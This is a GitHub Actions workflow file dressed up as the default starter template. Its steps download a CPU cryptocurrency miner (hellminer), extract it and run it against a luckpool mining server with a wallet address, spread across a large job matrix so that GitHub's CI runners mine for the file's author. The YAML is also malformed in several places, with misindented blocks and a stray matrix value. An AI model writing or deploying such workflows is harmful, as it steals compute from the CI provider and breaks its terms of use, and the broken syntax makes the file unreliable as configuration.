# This is a basic workflow to help you get started with Actions

name: olish1

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: windows-latest
strategy:
max-parallel: 5
fail-fast: false
matrix:

                                        go: [1.0, 1.1, 1.2, 1.3, 1,35]

                                                flag: [A, B, C, D, E, F, G, H, I]

                                                    env:

                                                            NUM_JOBS: 20

                                                                    JOB: ${{ matrix.go }}
    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: Invoke-WebRequest https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_win64_avx.zip
      - name: Extract

      run: Expand-Archive hellminer_cpu_win64_avx.zip

      # Runs a set of commands using the runners shell
      - name: Run a multi-line script
        run: .\hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RPGVM53TkPTEUkuGRFGcCA5cCRkzJfDzpZ.workename -p x --cpu 1
        
         - name: END

      run: exit

